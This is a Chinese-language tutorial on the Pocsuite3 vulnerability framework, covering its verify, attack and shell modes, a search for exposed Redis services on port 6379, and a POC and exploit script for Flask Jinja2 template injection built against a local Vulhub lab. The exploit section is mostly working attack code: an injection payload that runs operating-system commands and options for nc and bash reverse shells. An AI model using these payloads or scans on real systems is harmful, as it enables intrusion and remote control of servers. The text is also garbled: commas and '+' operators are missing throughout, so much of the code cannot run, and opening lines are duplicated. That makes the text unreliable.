poc测试场景要求:实用工具Pocsuite使用python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify
5、使用Zoomey搜索引擎,搜索开放端口6379的Redis服务python3 pocsuite.py -r pocs/* -u url --verify
4、使用多线程。–threads表示线程数1、verify验证模式,验证目标是否存在漏洞。-r为脚本路径,-u为目标地址python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify
2、批量验证,将需要验证的所有目标IP写到一个txt文件中批量利用python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url.txt --verify
3、加载文件夹下所有poc对目标进行测试,-r为文件夹路径
作者:guko
pocsuite是一款基于漏洞与POC的远程漏洞验证框架,记录基本使用和POC跟EXP编写的学习记录
0x01 安装
直接下载解压安装
|
wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip
|
0x02 使用方法
Pocsuite具有两种交互模式,一种是命令行模式,另一种是控制台交互模式。–verify参数来调用verify方法,用于验证目标是否存在漏洞,–attack参数调用attack方法,用来向目标发起攻击。
1、verify验证模式,验证目标是否存在漏洞。-r为脚本路径,-u为目标地址
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify
|
2、批量验证,将需要验证的所有目标IP写到一个txt文件中批量利用
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url.txt --verify
|
3、加载文件夹下所有poc对目标进行测试,-r为文件夹路径
|
python3 pocsuite.py -r pocs/* -u url --verify
|
4、使用多线程。–threads表示线程数
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify
|
5、使用Zoomey搜索引擎,搜索开放端口6379的Redis服务
|
python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2
|
6、Attack模式,向目标发起有效供给
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack
|
7、使用shell交互式模式,对目标进行远程控制
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --shell
|
8、使用自定义命令‘command’,调用外部传递参数,进行半交互式命令执行
|
python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack --command "whoami"
|
0x03 POC脚本编写搭建Flask服务器模板环境
这里直接用VULHUB中的环境快速搭建
|
https://github.com/vulhub/vulhub/tree/master/flask/ssti
docker-compose build
docker-compose up -d
|
实际编写,将模版的_verify方法替换成Flask漏洞检测脚本既完成POC的编写
|
#!/usr/bin/python3
#新建一个符合POC命令规范的py文件
#编写POC实现类DemoPOC,继承自POCBase类
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase Output register_poc logger requests OptDict VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD POC_CATEGORY
class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1.1'] # POC作者名字
vu1Date = '1.1' #漏洞公开时间
updateDate = '1.1' #编写POC时间
references = ['flask'] #漏洞地址来源
name = 'flask' #POC名称
appPowerLink = 'flask'#漏洞厂商主页地址
appName = 'flask'#漏洞应用名称
appVersion = '1.1' #漏洞影响版本
vu1Type = '' #漏洞类型
desc = '''
test
''' #漏洞简要描述
samples = ['00.00.00.00:8000'] #测试样例,使用POC测试成功的网站
install_requires = []
# 编写验证模式,在_verify方法中写入POC验证脚本
def _verify(self):
resu1t = {}
path = "/?name="
url = self.url path
payload = "{{22*22}}"
try:
resq = requests.get(url payload)
if resq and resq.status_code == 200 and "484" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)
def trim(str):
newstr = ''
for ch in str: # 遍历每一个字符串
if ch != ' ':
newstr = newstr ch
return newstr
#编写攻击模式,用_attack()函数中的写入EXP利用脚本,在攻击模式下可以不对目标进行getshell,查询管理员账户密码等操作
def _attack(self):
output = Output(self)
result = {}
# 攻击代码
def parse_attack(self result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
|
0x04 EXP脚本编写
EXP脚本的编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞利用的脚本即可
|
def _attack(self):
resu1t = {}
path = "/?name="
url = self.url path
payload = 'name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("whoami").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}'
try:
resq = requests.get(url payload)
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)
|
既完成EXP编写,运行如下
|
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack
|
在Pocsuite3中,可以接受用户输入的命令行参数,对目标系统进行半交互控制。先要编写一个接受自定义命令的函数,将接收到的命令赋值给command参数
|
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC
"bash": REVERSE_PAYLOAD.BASH
}
o["command"] = OptDict(selected="bash" default=payload)
return o
|
下面,创造一个cmd变量,用于接收用户输入的command命令参数,并嵌入payload字符串中。将写好的payload与url地址拼接,并通过requests函数发送到目标系统,即可在目标系统执行命令,将命令执行结果输出
|
def _attack(self):
resu1t = {}
path = "/?name="
url = self.url path
payload = 'name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("whoami").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}'
try:
resq = requests.get(url payload)
t = resq.text
t = t.replace('\n' '').replace('\r' '')
print(t)
t = t.replace(" " "")
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = t
except Exception as e:
pass
return self.parse_output(resu1t)
|
最终完成的代码
|
#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase Output register_poc logger requests OptDict VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD POC_CATEGORY
class DemoPOC(POCBase):
vulID = '1.1'
version = '1.1'
author = ['1.1'] # POC作者名字
vu1Date = '1.1' # 漏洞公开时间
updateDate = '1.1' # 编写POC时间
references = ['flask'] # 漏洞地址来源
name = 'flask' # POC名称
appPowerLink = 'flask' # 漏洞厂商主页地址
appName = 'flask' # 漏洞应用名称
appVersion = '1.1' # 漏洞影响版本
vu1Type = '' # 漏洞类型
desc = '''
test
''' # 漏洞简要描述
samples = ['00.00.00.00:8000'] # 测试样例,使用POC测试成功的网站
install_requires = []
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC
"bash": REVERSE_PAYLOAD.BASH
}
o["command"] = OptDict(selected="bash" default=payload)
return o
def _verify(self):
# output = Output(self)
# result = {}
resu1t = {}
path = "/?name="
url = self.url path
payload = "{{22*22}}"
try:
resq = requests.get(url payload)
if resq and resq.status_code == 200 and "484" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = payload
except Exception as e:
pass
return self.parse_output(resu1t)
def _attack(self):
resu1t = {}
path = "/?name="
url = self.url path
payload = 'name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("whoami").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}'
try:
resq = requests.get(url payload)
t = resq.text
t = t.replace('\n' '').replace('\r' '')
print(t)
t = t.replace(" " "")
if resq and resq.status_code == 200 and "www" in resq.text:
resu1t['VerifyInfo'] = {}
resu1t['VerifyInfo']['URL'] = url
resu1t['VerifyInfo']['name'] = t
except Exception as e:
pass
return self.parse_output(resu1t)
def parse_attack(self result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _shell(self):
return
def parse_output(self result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
|
运行
|
python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'
|
参考资料
python安全攻防渗透测试实战指南
关于Pocsuite使用讲解完毕,关注 至察助安 公众号获取更多优质网络安全知识,无优质不分享。
